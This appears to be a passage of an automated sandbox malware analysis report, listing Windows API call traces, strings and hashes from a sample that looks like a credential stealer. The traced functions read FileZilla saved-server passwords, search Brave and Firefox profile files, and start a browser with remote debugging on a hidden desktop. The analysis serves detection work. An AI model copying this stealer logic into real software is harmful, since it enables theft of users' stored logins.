                          • lstrcpy.KERNEL32(00000000,00000000), ref: 003B3F41
                          • lstrcat.KERNEL32(00000000,003D1794), ref: 003B3F4D
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 003B3F75
                          • lstrlen.KERNEL32(?), ref: 003B3F89
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 003B3FA9
                          • lstrcat.KERNEL32(00000000,?), ref: 003B3FB7
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 003B3FE0
                          • lstrcpy.KERNEL32(00000000,003CCFEC), ref: 003B401F
                          • lstrlen.KERNEL32(00F2D6C0), ref: 003B402E
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 003B4056
                          • lstrcat.KERNEL32(00000000,00000000), ref: 003B4061
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 003B408A
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 003B40CE
                          • lstrcat.KERNEL32(00000000), ref: 003B40DB
                          • FindNextFileA.KERNEL32(00000000,?), ref: 003B42D9
                          • FindClose.KERNEL32(00000000), ref: 003B42E8
                          Similarity
                          • API ID: lstrcpy$lstrcat$lstrlen$Find$File$CloseFirstNextwsprintf
                          • String ID: %s\*.*
                          • API String ID: 1006159827-1013718255
                          • Opcode ID: 9d8e13bb1c9b7711cbf82d51e1add9c649576622350ce18f3827de004b8ede1b
                          • Instruction ID: 8b084c9dbfe7aaabc4ec0750140383fe23bc4a398d9805b6bfd61db91a82f3da
                          • Opcode Fuzzy Hash: 9d8e13bb1c9b7711cbf82d51e1add9c649576622350ce18f3827de004b8ede1b
                          • Instruction Fuzzy Hash: 5762C331A11626ABCB23EFA8DC48AEF77B9EF50704F05412AF905A7A51DB34DD05CB90
                          APIs
                          • lstrcpy.KERNEL32(00000000,003CCFEC), ref: 003B6995
                          • SHGetFolderPathA.SHELL32(00000000,00000028,00000000,00000000,?), ref: 003B69C8
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 003B6A02
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 003B6A29
                          • lstrcat.KERNEL32(00000000,00000000), ref: 003B6A34
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 003B6A5D
                          • lstrlen.KERNEL32(\AppData\Roaming\FileZilla\recentservers.xml), ref: 003B6A77
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 003B6A99
                          • lstrcat.KERNEL32(00000000,\AppData\Roaming\FileZilla\recentservers.xml), ref: 003B6AA5
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 003B6AD0
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 003B6B00
                          • LocalAlloc.KERNEL32(00000040,?), ref: 003B6B35
                          • lstrcpy.KERNEL32(00000000,003CCFEC), ref: 003B6B9D
                          • lstrcpy.KERNEL32(00000000,003CCFEC), ref: 003B6BCD
                          Similarity
                          • API ID: lstrcpy$lstrcat$AllocFolderLocalPathlstrlen
                          • String ID: <Host>$<Pass encoding="base64">$<Port>$<User>$\AppData\Roaming\FileZilla\recentservers.xml$browser: FileZilla$login: $password: $profile: null$url:
                          • API String ID: 313953988-555421843
                          • Opcode ID: 050be325989fbb58ee2b6d9d6af2e10fb405a7174560f5c257cdd01eb492f5b7
                          • Instruction ID: 084248fdf3c077fe03ae6873dff1e06e9401863bbfd4e7a5d196154182bf1849
                          • Opcode Fuzzy Hash: 050be325989fbb58ee2b6d9d6af2e10fb405a7174560f5c257cdd01eb492f5b7
                          • Instruction Fuzzy Hash: B442D030A11216ABCB23EBB8DC4AAAF7B79EF51704F05441AF905EB652DB34DD05CB60
                          APIs
                          • lstrcpy.KERNEL32(00000000,003CCFEC), ref: 003ADBC1
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 003ADBE4
                          • lstrcat.KERNEL32(00000000,00000000), ref: 003ADBEF
                          • lstrlen.KERNEL32(003D4CA8), ref: 003ADBFA
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 003ADC17
                          • lstrcat.KERNEL32(00000000,003D4CA8), ref: 003ADC23
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 003ADC4C
                          • lstrcpy.KERNEL32(00000000,003CCFEC), ref: 003ADC8F
                          • lstrcpy.KERNEL32(00000000,003CCFEC), ref: 003ADCBF
                          • FindFirstFileA.KERNEL32(00000000,?), ref: 003ADCD0
                          • StrCmpCA.SHLWAPI(?,003D17A0), ref: 003ADCF0
                          • StrCmpCA.SHLWAPI(?,003D17A4), ref: 003ADD0A
                          • lstrlen.KERNEL32(003CCFEC), ref: 003ADD1D
                          • lstrcpy.KERNEL32(00000000,003CCFEC), ref: 003ADD47
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 003ADD70
                          • lstrcat.KERNEL32(00000000,00000000), ref: 003ADD7B
                          • lstrlen.KERNEL32(003D1794), ref: 003ADD86
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 003ADDA3
                          • lstrcat.KERNEL32(00000000,003D1794), ref: 003ADDAF
                          • lstrlen.KERNEL32(?), ref: 003ADDBC
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 003ADDDF
                          • lstrcat.KERNEL32(00000000,?), ref: 003ADDED
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 003ADE19
                          • lstrlen.KERNEL32(003D1794), ref: 003ADE3D
                          • lstrcpy.KERNEL32(00000000,?), ref: 003ADE6F
                          • lstrcat.KERNEL32(00000000,003D1794), ref: 003ADE7B
                          • lstrlen.KERNEL32(00F29408), ref: 003ADE8A
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 003ADEB0
                          • lstrcat.KERNEL32(00000000,00000000), ref: 003ADEBB
                          • lstrlen.KERNEL32(003D1794), ref: 003ADEC6
                          • lstrcpy.KERNEL32(00000000,?), ref: 003ADEE6
                          • lstrcat.KERNEL32(00000000,003D1794), ref: 003ADEF2
                          • lstrlen.KERNEL32(00F290F8), ref: 003ADF01
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 003ADF27
                          • lstrcat.KERNEL32(00000000,00000000), ref: 003ADF32
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 003ADF5E
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 003ADFA5
                          • lstrcat.KERNEL32(00000000,003D1794), ref: 003ADFB1
                          • lstrlen.KERNEL32(00F29408), ref: 003ADFC0
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 003ADFE9
                          • lstrcat.KERNEL32(00000000,00000000), ref: 003ADFF4
                          • lstrlen.KERNEL32(003D1794), ref: 003ADFFF
                          • lstrcpy.KERNEL32(00000000,?), ref: 003AE022
                          • lstrcat.KERNEL32(00000000,003D1794), ref: 003AE02E
                          • lstrlen.KERNEL32(00F290F8), ref: 003AE03D
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 003AE063
                          • lstrcat.KERNEL32(00000000,00000000), ref: 003AE06E
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 003AE09A
                          • StrCmpCA.SHLWAPI(?,Brave), ref: 003AE0CD
                          • StrCmpCA.SHLWAPI(?,Preferences), ref: 003AE0E7
                          • lstrcpy.KERNEL32(00000000,003CCFEC), ref: 003AE11F
                          • lstrlen.KERNEL32(00F2D6C0), ref: 003AE12E
                          • lstrcpy.KERNEL32(00000000,?), ref: 003AE155
                          • lstrcat.KERNEL32(00000000,?), ref: 003AE15D
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 003AE19F
                          • lstrcat.KERNEL32(00000000), ref: 003AE1A9
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 003AE1D0
                          • CopyFileA.KERNEL32(00000000,?,00000001), ref: 003AE1F9
                          • lstrcpy.KERNEL32(00000000,003CCFEC), ref: 003AE22F
                          • lstrlen.KERNEL32(00F290B8), ref: 003AE23D
                          • lstrcpy.KERNEL32(00000000,?), ref: 003AE261
                          • lstrcat.KERNEL32(00000000,00F290B8), ref: 003AE269
                          • FindNextFileA.KERNEL32(00000000,?), ref: 003AE988
                          • FindClose.KERNEL32(00000000), ref: 003AE997
                          Similarity
                          • API ID: lstrcpy$lstrcat$lstrlen$FileFind$CloseCopyFirstNext
                          • String ID: Brave$Preferences$\Brave\Preferences
                          • API String ID: 1346089424-1230934161
                          • Opcode ID: a8600c12cc1cd8c123ffd78d04f93aab06703cb059d4cd38e71ba2ac0c31f633
                          • Instruction ID: e973a1863be94fe89276972b195013e7604249e874ce5759d5696e8de6249dbf
                          • Opcode Fuzzy Hash: a8600c12cc1cd8c123ffd78d04f93aab06703cb059d4cd38e71ba2ac0c31f633
                          • Instruction Fuzzy Hash: D6529F71A112169BCB22EFB8DC89AAF77B9EF56700F05442AF806DB651DB34DC05CB90
                          APIs
                          • lstrcpy.KERNEL32(00000000,?), ref: 003A60FF
                          • lstrcpy.KERNEL32(00000000,003CCFEC), ref: 003A6152
                          • lstrcpy.KERNEL32(00000000,003CCFEC), ref: 003A6185
                          • lstrcpy.KERNEL32(00000000,003CCFEC), ref: 003A61B5
                          • lstrcpy.KERNEL32(00000000,003CCFEC), ref: 003A61F0
                          • lstrcpy.KERNEL32(00000000,003CCFEC), ref: 003A6223
                          • InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 003A6233
                          Similarity
                          • API ID: lstrcpy$InternetOpen
                          • String ID: "$------
                          • API String ID: 2041821634-2370822465
                          • Opcode ID: c118bea9f51bf039b73223947ca1bdbf89e4d760ffba4ad8718c5a279f43f42a
                          • Instruction ID: aa8a5872a329370e1cb956e2fcad079143aa84d0e7e88aee458f47bd29ed278f
                          • Opcode Fuzzy Hash: c118bea9f51bf039b73223947ca1bdbf89e4d760ffba4ad8718c5a279f43f42a
                          • Instruction Fuzzy Hash: 90524C71E112169BCB22EBA8DC49BAF77B9EF55700F19442AF805EB251DB34EC05CB90
                          APIs
                          • lstrcpy.KERNEL32(00000000,003CCFEC), ref: 003B6B9D
                          • lstrcpy.KERNEL32(00000000,003CCFEC), ref: 003B6BCD
                          • lstrcpy.KERNEL32(00000000,003CCFEC), ref: 003B6BFD
                          • lstrcpy.KERNEL32(00000000,003CCFEC), ref: 003B6C2F
                          • GetProcessHeap.KERNEL32(00000000,000F423F), ref: 003B6C3C
                          • RtlAllocateHeap.NTDLL(00000000), ref: 003B6C43
                          • StrStrA.SHLWAPI(00000000,<Host>), ref: 003B6C5A
                          • lstrlen.KERNEL32(00000000), ref: 003B6C65
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 003B6CA8
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 003B6CCF
                          • StrStrA.SHLWAPI(00000000,<Port>), ref: 003B6CE2
                          • lstrlen.KERNEL32(00000000), ref: 003B6CED
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 003B6D30
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 003B6D57
                          • StrStrA.SHLWAPI(00000000,<User>), ref: 003B6D6A
                          • lstrlen.KERNEL32(00000000), ref: 003B6D75
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 003B6DB8
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 003B6DDF
                          • StrStrA.SHLWAPI(00000000,<Pass encoding="base64">), ref: 003B6DF2
                          • lstrlen.KERNEL32(00000000), ref: 003B6E01
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 003B6E49
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 003B6E71
                          • CryptStringToBinaryA.CRYPT32(00000000,00000000,00000001,00000000,?,00000000,00000000), ref: 003B6E94
                          • LocalAlloc.KERNEL32(00000040,00000000), ref: 003B6EA8
                          • CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,00000000,00000000,00000000), ref: 003B6EC9
                          • LocalFree.KERNEL32(00000000), ref: 003B6ED4
                          • lstrlen.KERNEL32(?), ref: 003B6F6E
                          • lstrlen.KERNEL32(?), ref: 003B6F81
                          Similarity
                          • API ID: lstrcpy$lstrlen$BinaryCryptHeapLocalString$AllocAllocateFreeProcess
                          • String ID: <Host>$<Pass encoding="base64">$<Port>$<User>$browser: FileZilla$login: $password: $profile: null$url:
                          • API String ID: 2641759534-2314656281
                          • Opcode ID: c357fbfebc710e8c99c11aefcb69b5be3413dfac9e98359dc5f13dbbd508e840
                          • Instruction ID: a49903fb5f327cf1ee086c93da05b89e76c6ca54138fcf939eadc761da3be8ee
                          • Opcode Fuzzy Hash: c357fbfebc710e8c99c11aefcb69b5be3413dfac9e98359dc5f13dbbd508e840
                          • Instruction Fuzzy Hash: 3702B131A11216ABCB22EBB8DC4AEAF7B79EF15704F05041AF906EB652DB34DD05C760
                          APIs
                          • lstrcpy.KERNEL32(00000000,003CCFEC), ref: 003B4B51
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 003B4B74
                          • lstrcat.KERNEL32(00000000,00000000), ref: 003B4B7F
                          • lstrlen.KERNEL32(003D4CA8), ref: 003B4B8A
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 003B4BA7
                          • lstrcat.KERNEL32(00000000,003D4CA8), ref: 003B4BB3
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 003B4BDE
                          • FindFirstFileA.KERNEL32(00000000,?), ref: 003B4BFA
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1519126327.00000000003A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003A0000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_3a0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrcpy$lstrcat$FileFindFirstlstrlen
                          • String ID: prefs.js
                          • API String ID: 2567437900-3783873740
                          • Opcode ID: c176a2afabc18d8357e69863cf484e9af09e2b9b2dc87506327466c83e85b97d
                          • Instruction ID: 72e9353599a3316a0b66cf8abb5a2c40e3443e720fcae809bb32b2ad647d63c6
                          • Opcode Fuzzy Hash: c176a2afabc18d8357e69863cf484e9af09e2b9b2dc87506327466c83e85b97d
                          • Instruction Fuzzy Hash: 81927430A026118FDB26DF29D948BAAB7F5BF45718F1A806EE509DB762D731DC41CB80
                          APIs
                          • lstrcpy.KERNEL32(00000000,003CCFEC), ref: 003B1291
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 003B12B4
                          • lstrcat.KERNEL32(00000000,00000000), ref: 003B12BF
                          • lstrlen.KERNEL32(003D4CA8), ref: 003B12CA
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 003B12E7
                          • lstrcat.KERNEL32(00000000,003D4CA8), ref: 003B12F3
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 003B131E
                          • FindFirstFileA.KERNEL32(00000000,?), ref: 003B133A
                          • StrCmpCA.SHLWAPI(?,003D17A0), ref: 003B135C
                          • StrCmpCA.SHLWAPI(?,003D17A4), ref: 003B1376
                          • lstrcpy.KERNEL32(00000000,003CCFEC), ref: 003B13AF
                          • lstrcpy.KERNEL32(00000000,?), ref: 003B13D7
                          • lstrcat.KERNEL32(00000000,00000000), ref: 003B13E2
                          • lstrlen.KERNEL32(003D1794), ref: 003B13ED
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 003B140A
                          • lstrcat.KERNEL32(00000000,003D1794), ref: 003B1416
                          • lstrlen.KERNEL32(?), ref: 003B1423
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 003B1443
                          • lstrcat.KERNEL32(00000000,?), ref: 003B1451
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 003B147A
                          • StrCmpCA.SHLWAPI(?,00F2D810), ref: 003B14A3
                          • lstrcpy.KERNEL32(00000000,?), ref: 003B14E4
                          • lstrcpy.KERNEL32(00000000,?), ref: 003B150D
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 003B1535
                          • StrCmpCA.SHLWAPI(?,00F2DBC0), ref: 003B1552
                          • lstrcpy.KERNEL32(00000000,?), ref: 003B1593
                          • lstrcpy.KERNEL32(00000000,?), ref: 003B15BC
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 003B15E4
                          • StrCmpCA.SHLWAPI(?,00F2D7E0), ref: 003B1602
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 003B1633
                          • lstrcpy.KERNEL32(00000000,?), ref: 003B165C
                          • lstrcpy.KERNEL32(00000000,?), ref: 003B1685
                          • StrCmpCA.SHLWAPI(?,00F2D780), ref: 003B16B3
                          • lstrcpy.KERNEL32(00000000,?), ref: 003B16F4
                          • lstrcpy.KERNEL32(00000000,?), ref: 003B171D
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 003B1745
                          • lstrcpy.KERNEL32(00000000,?), ref: 003B1796
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 003B17BE
                          • lstrcpy.KERNEL32(00000000,?), ref: 003B17F5
                          • FindNextFileA.KERNEL32(00000000,?), ref: 003B181C
                          • FindClose.KERNEL32(00000000), ref: 003B182B
                          Memory Dump Source
                          • Source File: 00000000.00000002.1519126327.00000000003A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003A0000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_3a0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrcpy$lstrcat$Findlstrlen$File$CloseFirstNext
                          • String ID:
                          • API String ID: 1346933759-0
                          • Opcode ID: eeb5278f064232e11521dddd743e343c5b068b5a3f20a29d1db5f1065f991bdf
                          • Instruction ID: ee3d49b05e14970222831fe33e985a27c28c92033d8f973ed2d3d957d5f881fa
                          • Opcode Fuzzy Hash: eeb5278f064232e11521dddd743e343c5b068b5a3f20a29d1db5f1065f991bdf
                          • Instruction Fuzzy Hash: 96129C71A112069BCB26EF78D899AAF77B8EF45304F45452EF846D7A50EF30DC058B90
                          APIs
                          • wsprintfA.USER32 ref: 003BCBFC
                          • FindFirstFileA.KERNEL32(?,?), ref: 003BCC13
                          • lstrcat.KERNEL32(?,?), ref: 003BCC5F
                          • StrCmpCA.SHLWAPI(?,003D17A0), ref: 003BCC71
                          • StrCmpCA.SHLWAPI(?,003D17A4), ref: 003BCC8B
                          • wsprintfA.USER32 ref: 003BCCB0
                          • PathMatchSpecA.SHLWAPI(?,00F290E8), ref: 003BCCE2
                          • CoInitialize.OLE32(00000000), ref: 003BCCEE
                            • Part of subcall function 003BCAE0: CoCreateInstance.COMBASE(003CB110,00000000,00000001,003CB100,?), ref: 003BCB06
                            • Part of subcall function 003BCAE0: MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,000000FF,?,00000104), ref: 003BCB46
                            • Part of subcall function 003BCAE0: lstrcpyn.KERNEL32(?,?,00000104), ref: 003BCBC9
                          • CoUninitialize.COMBASE ref: 003BCD09
                          • lstrcat.KERNEL32(?,?), ref: 003BCD2E
                          • lstrlen.KERNEL32(?), ref: 003BCD3B
                          • StrCmpCA.SHLWAPI(?,003CCFEC), ref: 003BCD55
                          • wsprintfA.USER32 ref: 003BCD7D
                          • wsprintfA.USER32 ref: 003BCD9C
                          • PathMatchSpecA.SHLWAPI(?,?), ref: 003BCDB0
                          • wsprintfA.USER32 ref: 003BCDD8
                          • CopyFileA.KERNEL32(?,?,00000001), ref: 003BCDF1
                          • CreateFileA.KERNEL32(?,80000000,00000003,00000000,00000003,00000080,00000000), ref: 003BCE10
                          • GetFileSizeEx.KERNEL32(00000000,?), ref: 003BCE28
                          • CloseHandle.KERNEL32(00000000), ref: 003BCE33
                          • CloseHandle.KERNEL32(00000000), ref: 003BCE3F
                          • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 003BCE54
                          • lstrcpy.KERNEL32(00000000,?), ref: 003BCE94
                          • FindNextFileA.KERNEL32(?,?), ref: 003BCF8D
                          • FindClose.KERNEL32(?), ref: 003BCF9F
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1519126327.00000000003A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003A0000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_3a0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: Filewsprintf$CloseFind$CreateHandleMatchPathSpeclstrcat$ByteCharCopyFirstInitializeInstanceMultiNextSizeUninitializeUnothrow_t@std@@@Wide__ehfuncinfo$??2@lstrcpylstrcpynlstrlen
                          • String ID: %s%s$%s\%s$%s\%s\%s$%s\*
                          • API String ID: 3860919712-2388001722
                          • Opcode ID: bba3aea64adc3b25d72b29331c21d396d0edb49b021104d1ada8ffa7fd8e9194
                          • Instruction ID: 04b3c65849a0bf8bdae80306971b8515452f125637dfa74d4a81879c121ca3b1
                          • Opcode Fuzzy Hash: bba3aea64adc3b25d72b29331c21d396d0edb49b021104d1ada8ffa7fd8e9194
                          • Instruction Fuzzy Hash: 3EC17071A11219ABCB25DF64DC49EEE7779FF94305F00459AF609A7290EE30AE44CF90
                          APIs
                          • lstrcpy.KERNEL32(00000000,003CCFEC), ref: 003B1291
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 003B12B4
                          • lstrcat.KERNEL32(00000000,00000000), ref: 003B12BF
                          • lstrlen.KERNEL32(003D4CA8), ref: 003B12CA
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 003B12E7
                          • lstrcat.KERNEL32(00000000,003D4CA8), ref: 003B12F3
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 003B131E
                          • FindFirstFileA.KERNEL32(00000000,?), ref: 003B133A
                          • StrCmpCA.SHLWAPI(?,003D17A0), ref: 003B135C
                          • StrCmpCA.SHLWAPI(?,003D17A4), ref: 003B1376
                          • lstrcpy.KERNEL32(00000000,003CCFEC), ref: 003B13AF
                          • lstrcpy.KERNEL32(00000000,?), ref: 003B13D7
                          • lstrcat.KERNEL32(00000000,00000000), ref: 003B13E2
                          • lstrlen.KERNEL32(003D1794), ref: 003B13ED
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 003B140A
                          • lstrcat.KERNEL32(00000000,003D1794), ref: 003B1416
                          • lstrlen.KERNEL32(?), ref: 003B1423
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 003B1443
                          • lstrcat.KERNEL32(00000000,?), ref: 003B1451
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 003B147A
                          • StrCmpCA.SHLWAPI(?,00F2D810), ref: 003B14A3
                          • lstrcpy.KERNEL32(00000000,?), ref: 003B14E4
                          • lstrcpy.KERNEL32(00000000,?), ref: 003B150D
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 003B1535
                          • StrCmpCA.SHLWAPI(?,00F2DBC0), ref: 003B1552
                          • lstrcpy.KERNEL32(00000000,?), ref: 003B1593
                          • lstrcpy.KERNEL32(00000000,?), ref: 003B15BC
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 003B15E4
                          • lstrcpy.KERNEL32(00000000,?), ref: 003B1796
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 003B17BE
                          • lstrcpy.KERNEL32(00000000,?), ref: 003B17F5
                          • FindNextFileA.KERNEL32(00000000,?), ref: 003B181C
                          • FindClose.KERNEL32(00000000), ref: 003B182B
                          Memory Dump Source
                          • Source File: 00000000.00000002.1519126327.00000000003A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003A0000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_3a0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrcpy$lstrcat$Findlstrlen$File$CloseFirstNext
                          • String ID:
                          • API String ID: 1346933759-0
                          • Opcode ID: 23ef62f69a4163b6f7c84508d6def1bc4ddf5bc26bc95ce644776f1b0e709819
                          • Instruction ID: b522aee5cbad5718798c6cf14ce1ddfd473fcbd01112f2ee31da6024ad8f0c9d
                          • Opcode Fuzzy Hash: 23ef62f69a4163b6f7c84508d6def1bc4ddf5bc26bc95ce644776f1b0e709819
                          • Instruction Fuzzy Hash: A2C18D31A112169BCB22EF68DC99AEF77B8EF51704F450429F94ADBA51EF30DC058B90
                          APIs
                          • memset.MSVCRT ref: 003A9790
                          • lstrcat.KERNEL32(?,?), ref: 003A97A0
                          • lstrcat.KERNEL32(?,?), ref: 003A97B1
                          • lstrcat.KERNEL32(?, --remote-debugging-port=9229 --profile-directory="), ref: 003A97C3
                          • memset.MSVCRT ref: 003A97D7
                            • Part of subcall function 003C3E70: lstrcpy.KERNEL32(00000000,003CCFEC), ref: 003C3EA5
                            • Part of subcall function 003C3E70: lstrcpy.KERNEL32(00000000,00F2E5C8), ref: 003C3ECF
                            • Part of subcall function 003C3E70: GetSystemTime.KERNEL32(?,00000000,00000000,00000000,?,?,?,?,?,?,003A134E,?,0000001A), ref: 003C3ED9
                          • wsprintfA.USER32 ref: 003A9806
                          • OpenDesktopA.USER32(?,00000000,00000001,10000000), ref: 003A9827
                          • CreateDesktopA.USER32(?,00000000,00000000,00000000,10000000,00000000), ref: 003A9844
                            • Part of subcall function 003C46A0: CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,?,00000000), ref: 003C46B9
                            • Part of subcall function 003C46A0: Process32First.KERNEL32(00000000,00000128), ref: 003C46C9
                            • Part of subcall function 003C46A0: Process32Next.KERNEL32(00000000,00000128), ref: 003C46DB
                            • Part of subcall function 003C46A0: StrCmpCA.SHLWAPI(?,?), ref: 003C46ED
                            • Part of subcall function 003C46A0: OpenProcess.KERNEL32(00000001,00000000,?), ref: 003C4702
                            • Part of subcall function 003C46A0: TerminateProcess.KERNEL32(00000000,00000000), ref: 003C4711
                            • Part of subcall function 003C46A0: CloseHandle.KERNEL32(00000000), ref: 003C4718
                            • Part of subcall function 003C46A0: Process32Next.KERNEL32(00000000,00000128), ref: 003C4726
                            • Part of subcall function 003C46A0: CloseHandle.KERNEL32(00000000), ref: 003C4731
                          • lstrcat.KERNEL32(00000000,?), ref: 003A9878
                          • lstrcat.KERNEL32(00000000,?), ref: 003A9889
                          • lstrcat.KERNEL32(00000000,003D4B60), ref: 003A989B
                          • memset.MSVCRT ref: 003A98AF
                          • SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?), ref: 003A98D4
                          • lstrcpy.KERNEL32(00000000,?), ref: 003A9903
                          • StrStrA.SHLWAPI(00000000,00F2EBD8), ref: 003A9919
                          • lstrcpyn.KERNEL32(005D93D0,00000000,00000000), ref: 003A9938
                          • lstrlen.KERNEL32(?), ref: 003A994B
                          • wsprintfA.USER32 ref: 003A995B
                          • lstrcpy.KERNEL32(?,00000000), ref: 003A9971
                          • Sleep.KERNEL32(00001388), ref: 003A99E7
                            • Part of subcall function 003A1530: lstrcpy.KERNEL32(00000000,?), ref: 003A1557
                            • Part of subcall function 003A1530: lstrcpy.KERNEL32(00000000,?), ref: 003A1579
                            • Part of subcall function 003A1530: lstrcpy.KERNEL32(00000000,?), ref: 003A159B
                            • Part of subcall function 003A1530: lstrcpy.KERNEL32(00000000,?), ref: 003A15FF
                            • Part of subcall function 003A92B0: strlen.MSVCRT ref: 003A92E1
                            • Part of subcall function 003A92B0: strlen.MSVCRT ref: 003A92FA
                            • Part of subcall function 003A92B0: strlen.MSVCRT ref: 003A9399
                            • Part of subcall function 003A92B0: strlen.MSVCRT ref: 003A93E6
                            • Part of subcall function 003C4740: CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,00000000,?), ref: 003C4759
                            • Part of subcall function 003C4740: Process32First.KERNEL32(00000000,00000128), ref: 003C4769
                            • Part of subcall function 003C4740: Process32Next.KERNEL32(00000000,00000128), ref: 003C477B
                            • Part of subcall function 003C4740: OpenProcess.KERNEL32(00000001,00000000,?), ref: 003C479C
                            • Part of subcall function 003C4740: TerminateProcess.KERNEL32(00000000,00000000), ref: 003C47AB
                            • Part of subcall function 003C4740: CloseHandle.KERNEL32(00000000), ref: 003C47B2
                            • Part of subcall function 003C4740: Process32Next.KERNEL32(00000000,00000128), ref: 003C47C0
                            • Part of subcall function 003C4740: CloseHandle.KERNEL32(00000000), ref: 003C47CB
                          • CloseDesktop.USER32(?), ref: 003A9A1C
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1519126327.00000000003A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003A0000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_3a0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrcpy$Process32lstrcat$Close$HandleNextProcessstrlen$CreateDesktopOpenmemset$FirstSnapshotTerminateToolhelp32wsprintf$FolderPathSleepSystemTimelstrcpynlstrlen
                          • String ID: --remote-debugging-port=9229 --profile-directory="$%s%s$D
                          • API String ID: 958055206-1862457068
                          • Opcode ID: 8e2efb2bd83d41fdf0ac476dd03b4d0f1112fb97d44fb9a2277e481f6203807b
                          • Instruction ID: 9b3ccb6c98326a2dfd7ebedb1b7568fbd62d3a8e747c8998bb8277b6acdfdf3b
                          • Opcode Fuzzy Hash: 8e2efb2bd83d41fdf0ac476dd03b4d0f1112fb97d44fb9a2277e481f6203807b
                          • Instruction Fuzzy Hash: 1C916571A10218AFDB21EF64DC49FEE77B8EF54700F14459AF609AB291DF70AE448B90
                          APIs
                          • wsprintfA.USER32 ref: 003BE22C
                          • FindFirstFileA.KERNEL32(?,?), ref: 003BE243
                          • StrCmpCA.SHLWAPI(?,003D17A0), ref: 003BE263
                          • StrCmpCA.SHLWAPI(?,003D17A4), ref: 003BE27D
                          • wsprintfA.USER32 ref: 003BE2A2
                          • StrCmpCA.SHLWAPI(?,003CCFEC), ref: 003BE2B4
                          • wsprintfA.USER32 ref: 003BE2D1
                            • Part of subcall function 003BEDE0: lstrcpy.KERNEL32(00000000,?), ref: 003BEE12
                          • wsprintfA.USER32 ref: 003BE2F0
                          • PathMatchSpecA.SHLWAPI(?,?), ref: 003BE304
                          • lstrcat.KERNEL32(?,00F2F240), ref: 003BE335
                          • lstrcat.KERNEL32(?,003D1794), ref: 003BE347
